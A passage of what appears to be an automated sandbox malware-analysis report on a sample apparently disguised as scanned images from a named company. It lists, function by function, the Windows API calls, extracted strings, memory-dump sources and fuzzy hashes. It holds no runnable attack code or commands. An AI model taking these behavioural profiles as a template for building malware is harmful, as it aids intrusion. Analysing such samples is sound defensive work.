                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: @U=u$U
                                                        • API String ID: 4009187628-4110099822
                                                        • Opcode ID: a4e303798b4af48987eed3f175309bedb08e7cd84b319f12d8e27cee13ad8fc7
                                                        • Instruction ID: e48a096b07cab3d74e2a05693c22177ce262865b6eb4ca7e484897a35c0ec77d
                                                        • Opcode Fuzzy Hash: a4e303798b4af48987eed3f175309bedb08e7cd84b319f12d8e27cee13ad8fc7
                                                        • Instruction Fuzzy Hash: 8C71B330500205EFCF35DFA8D884AAA7BB6FF49361F144279ED565A1A9C7318C4ADB60
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00A95AA6
                                                        • inet_addr.WSOCK32(?,?,?), ref: 00A95AEB
                                                        • gethostbyname.WSOCK32(?), ref: 00A95AF7
                                                        • IcmpCreateFile.IPHLPAPI ref: 00A95B05
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A95B75
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A95B8B
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A95C00
                                                        • WSACleanup.WSOCK32 ref: 00A95C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 6b71f6fa46254ebc866047c9f4590cf721508cc2267bcb43069f40e5fb6b6143
                                                        • Instruction ID: a46102ae4b3d652e58a2cfda5e28d2675cd35743bbd22f8da3d3b42f9e35906d
                                                        • Opcode Fuzzy Hash: 6b71f6fa46254ebc866047c9f4590cf721508cc2267bcb43069f40e5fb6b6143
                                                        • Instruction Fuzzy Hash: 93519F31A047119FDB11EF78DD4AB2AB7E0EF49710F048929F956DB2A1EB70E801CB45
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                          • Part of subcall function 00A22344: GetCursorPos.USER32(?), ref: 00A22357
                                                          • Part of subcall function 00A22344: ScreenToClient.USER32(00AE67B0,?), ref: 00A22374
                                                          • Part of subcall function 00A22344: GetAsyncKeyState.USER32(00000001), ref: 00A22399
                                                          • Part of subcall function 00A22344: GetAsyncKeyState.USER32(00000002), ref: 00A223A7
                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00AAC2E4
                                                        • ImageList_EndDrag.COMCTL32 ref: 00AAC2EA
                                                        • ReleaseCapture.USER32 ref: 00AAC2F0
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00AAC39A
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AAC3AD
                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00AAC48F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                                        • API String ID: 1924731296-2104563098
                                                        • Opcode ID: 9a08c215f6d35b9dff7a1dd2bf03e8ed9c7c9bf0092c408cc45525972b21b015
                                                        • Instruction ID: 26e3979151836da18e968129638cccdcdd9ed996395823b4709ae8522f72cf07
                                                        • Opcode Fuzzy Hash: 9a08c215f6d35b9dff7a1dd2bf03e8ed9c7c9bf0092c408cc45525972b21b015
                                                        • Instruction Fuzzy Hash: D251BC70204341AFDB04EF64D996F6E7BE1FB99310F00892DF9918B2E1CB30A945CB52
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A8B73B
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A8B7B1
                                                        • GetLastError.KERNEL32 ref: 00A8B7BB
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00A8B828
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 80b314539dec0e9a267ccd0eec2b9be118f754f0e615e4cc7e6d39cdd677a5c5
                                                        • Instruction ID: 9714493d3e4ab44bd95fe4dca26af55b210be6c7f2a92bffcae0e94779d61c66
                                                        • Opcode Fuzzy Hash: 80b314539dec0e9a267ccd0eec2b9be118f754f0e615e4cc7e6d39cdd677a5c5
                                                        • Instruction Fuzzy Hash: 5831A435A01205AFDB10FFA8D985ABE7BB4FF55700F10802AF902D7291DB719942C761
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00AA645A
                                                        • GetDC.USER32(00000000), ref: 00AA6462
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AA646D
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00AA6479
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AA64B5
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AA64C6
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AA9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00AA6500
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AA6520
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID: @U=u
                                                        • API String ID: 3864802216-2594219639
                                                        • Opcode ID: 881fa197034746f4cfaf4da8154e5c6e91892722a6d48d5fa8e03c0e86a73b38
                                                        • Instruction ID: eaa231ba554c8a6b84031a8245d7ffb374e1305e1ecda6b643160bd4bdde8bb1
                                                        • Opcode Fuzzy Hash: 881fa197034746f4cfaf4da8154e5c6e91892722a6d48d5fa8e03c0e86a73b38
                                                        • Instruction Fuzzy Hash: D7316D72601215BFEB158F90CC4AFEA3FA9EF0A761F084065FE089A1D1D7759C42CB64
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A98BEC
                                                        • CoInitialize.OLE32(00000000), ref: 00A98C19
                                                        • CoUninitialize.OLE32 ref: 00A98C23
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00A98D23
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A98E50
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00AB2C0C), ref: 00A98E84
                                                        • CoGetObject.OLE32(?,00000000,00AB2C0C,?), ref: 00A98EA7
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00A98EBA
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A98F3A
                                                        • VariantClear.OLEAUT32(?), ref: 00A98F4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: a873493ec4879c73021e315dff98fa12f1752913695d54c4138c65cf9ae96cc1
                                                        • Instruction ID: 47e00fcf5683c39db4c2f5451ad0391c9beb29c1f1a2b82453d3d0c8f75fcac7
                                                        • Opcode Fuzzy Hash: a873493ec4879c73021e315dff98fa12f1752913695d54c4138c65cf9ae96cc1
                                                        • Instruction Fuzzy Hash: 31C12371208305AFDB04DF68C98492BB7E9BF8A748F00496DF58A9B251DB35ED06CB52
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00A8419D
                                                        • __swprintf.LIBCMT ref: 00A841AA
                                                          • Part of subcall function 00A438D8: __woutput_l.LIBCMT ref: 00A43931
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00A841D4
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00A841E0
                                                        • LockResource.KERNEL32(00000000), ref: 00A841ED
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00A8420D
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00A8421F
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00A8422E
                                                        • LockResource.KERNEL32(?), ref: 00A8423A
                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00A8429B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                        • String ID:
                                                        • API String ID: 1433390588-0
                                                        • Opcode ID: 3c32298b8d3b9211ac5c05837940aec8abeae464a243c2fdf241dff284334cb0
                                                        • Instruction ID: 4dfe25a9a3e16c414e782ec8a61f31fd7bd660fadc0a5caadb0ca82cd03dea4d
                                                        • Opcode Fuzzy Hash: 3c32298b8d3b9211ac5c05837940aec8abeae464a243c2fdf241dff284334cb0
                                                        • Instruction Fuzzy Hash: 0B31807560921BAFDB15EFA0DD48AFF7BACEF09301F004525F905D6150E730DA629BA0
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A81700
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A80778,?,00000001), ref: 00A81714
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00A8171B
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A80778,?,00000001), ref: 00A8172A
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A8173C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A80778,?,00000001), ref: 00A81755
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A80778,?,00000001), ref: 00A81767
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A80778,?,00000001), ref: 00A817AC
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A80778,?,00000001), ref: 00A817C1
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A80778,?,00000001), ref: 00A817CC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: cd2510e07ed80a32a7dbb0e7cd6920a89799c45e89b7dda94d25a412e5155663
                                                        • Instruction ID: 5e57dadc1da069be4c4fa2a56e57d81c43da4c1844e5f8de04f78b64de72a633
                                                        • Opcode Fuzzy Hash: cd2510e07ed80a32a7dbb0e7cd6920a89799c45e89b7dda94d25a412e5155663
                                                        • Instruction Fuzzy Hash: 6631A975600244AFEB25EFA4EC88F797BEDAB16711F104028F804CA2A0E7B49D43CF60
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A2FC06
                                                        • OleUninitialize.OLE32(?,00000000), ref: 00A2FCA5
                                                        • UnregisterHotKey.USER32(?), ref: 00A2FDFC
                                                        • DestroyWindow.USER32(?), ref: 00A64A00
                                                        • FreeLibrary.KERNEL32(?), ref: 00A64A65
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A64A92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 1a50b8d9136ee37356f6fdd4e8f1ee19daeaa164bd66946e5a3ce909f80c7c5b
                                                        • Instruction ID: 52f2a647be794be69284b68d59283f1210ec48c3514d75b186cd44196135122c
                                                        • Opcode Fuzzy Hash: 1a50b8d9136ee37356f6fdd4e8f1ee19daeaa164bd66946e5a3ce909f80c7c5b
                                                        • Instruction Fuzzy Hash: B5A18D34701222DFCB29EF58D995A69F774BF18740F1442BDE90AAB261CB30AD16CF54
                                                        APIs
                                                        • EnumChildWindows.USER32(?,00A7AA64), ref: 00A7A9A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 0de41823dbb08e92597a6bcad3710d552a4cb5bede52756daf05a54320a11bad
                                                        • Instruction ID: ac55fee4238c3a3e0fd7ac0d7dfd2f62f0b235de2644ba1d5e96cb75469527f0
                                                        • Opcode Fuzzy Hash: 0de41823dbb08e92597a6bcad3710d552a4cb5bede52756daf05a54320a11bad
                                                        • Instruction Fuzzy Hash: 8C919331A00506FADB58DF70C981BEEFB74BF94304F10C129E99EA7151DB30AA59DB91
                                                        APIs
                                                        • IsWindow.USER32(01776368), ref: 00AAB6A5
                                                        • IsWindowEnabled.USER32(01776368), ref: 00AAB6B1
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00AAB795
                                                        • SendMessageW.USER32(01776368,000000B0,?,?), ref: 00AAB7CC
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 00AAB809
                                                        • GetWindowLongW.USER32(01776368,000000EC), ref: 00AAB82B
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AAB843
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID: @U=u
                                                        • API String ID: 4072528602-2594219639
                                                        • Opcode ID: 9fc6a23fcc4aaa41f1bbdacd24e5b4552fee3cb79558975dca994fd756421988
                                                        • Instruction ID: 68f8d8b841a7023aea015e9e8d983718a75010c5d0283859ac24a5256c597bae
                                                        • Opcode Fuzzy Hash: 9fc6a23fcc4aaa41f1bbdacd24e5b4552fee3cb79558975dca994fd756421988
                                                        • Instruction Fuzzy Hash: FB71AC34611244AFDB24DFA4C8E4FBABBB9FF5A340F144469E945972E2C772A841CB60
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AA7093
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00AA70A7
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AA70C1
                                                        • _wcscat.LIBCMT ref: 00AA711C
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AA7133
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AA7161
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: @U=u$SysListView32
                                                        • API String ID: 307300125-1908207174
                                                        • Opcode ID: 7959ee9b88e7ee7d47fff4b2f12d5005f1ce0af8ad83f23335365316aabffe48
                                                        • Instruction ID: a4782aa1865b9de6ec110786133f014ffd6503c9df9080d0b7fba36bdb091205
                                                        • Opcode Fuzzy Hash: 7959ee9b88e7ee7d47fff4b2f12d5005f1ce0af8ad83f23335365316aabffe48
                                                        • Instruction Fuzzy Hash: 08418F71A04348AFDB219FA4CC85BEF77E8EF09350F10092AF545A72D1D7719D858B60
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AA655B
                                                        • GetWindowLongW.USER32(01776368,000000F0), ref: 00AA658E
                                                        • GetWindowLongW.USER32(01776368,000000F0), ref: 00AA65C3
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AA65F5
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AA661F
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00AA6630
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AA664A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 2178440468-2594219639
                                                        • Opcode ID: 4246b0685d70da014026ee7a4da37328dd92fd1cc60e0f84f065e7d6e7e47564
                                                        • Instruction ID: 03d8fbf0710cd7a266d3db82a3838b26a0814977123f26602c947b9397fa42bc
                                                        • Opcode Fuzzy Hash: 4246b0685d70da014026ee7a4da37328dd92fd1cc60e0f84f065e7d6e7e47564
                                                        • Instruction Fuzzy Hash: 09310230A04292AFDB24CFA8DC88F553BE1FB6A350F1901A8F5118F2F5CB61A841DF41
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00AAF910), ref: 00A9903D
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00AAF910), ref: 00A99071
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A991EB
                                                        • SysFreeString.OLEAUT32(?), ref: 00A99215
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: c8fce61c8675f9bbf9bfb05de3fd04ed6145c1b815b6c5ead9977a88f5d497df
                                                        • Instruction ID: 1b282f87d114da4559f47200ad993e8fa0140f746a23df7555e79a4b2952c14c
                                                        • Opcode Fuzzy Hash: c8fce61c8675f9bbf9bfb05de3fd04ed6145c1b815b6c5ead9977a88f5d497df
                                                        • Instruction Fuzzy Hash: 79F12871A00119EFDF04DF98C888EAEB7B9BF49315F208159F515AB291DB31AE46CB50
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A9F9C9
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A9FB5C
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A9FB80
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A9FBC0
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A9FBE2
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A9FD5E
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A9FD90
                                                        • CloseHandle.KERNEL32(?), ref: 00A9FDBF
                                                        • CloseHandle.KERNEL32(?), ref: 00A9FE36
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
